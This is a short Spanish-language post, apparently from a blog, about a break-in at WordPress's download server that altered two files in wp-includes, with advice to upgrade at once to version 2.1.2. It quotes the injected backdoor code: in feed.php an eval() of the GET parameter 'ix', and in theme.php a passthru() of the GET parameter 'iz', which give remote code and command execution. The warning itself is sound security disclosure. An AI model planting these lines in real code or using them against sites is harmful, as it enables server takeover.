Hace unos dias alguien ha entrado en la maquina de descargas de worpress y se han cambiado dos ficheros en wp-include en los cuales han metido codigo para ejecutar codigo por medio de parametro GET. Tal como dicen en la web de wordpress hay que actualizar inmeditamente a la version 2.1.2
El codigo injectado esta en estos dos ficheros:
-
wp-includes/feed.php
84 85 86function comment_text_phpfilter($filterdata) { eval($filterdata); }149if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); } -
wp-includes/theme.php
408 409 410function get_theme_mcommand($mcds) { passthru($mcds); }441if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }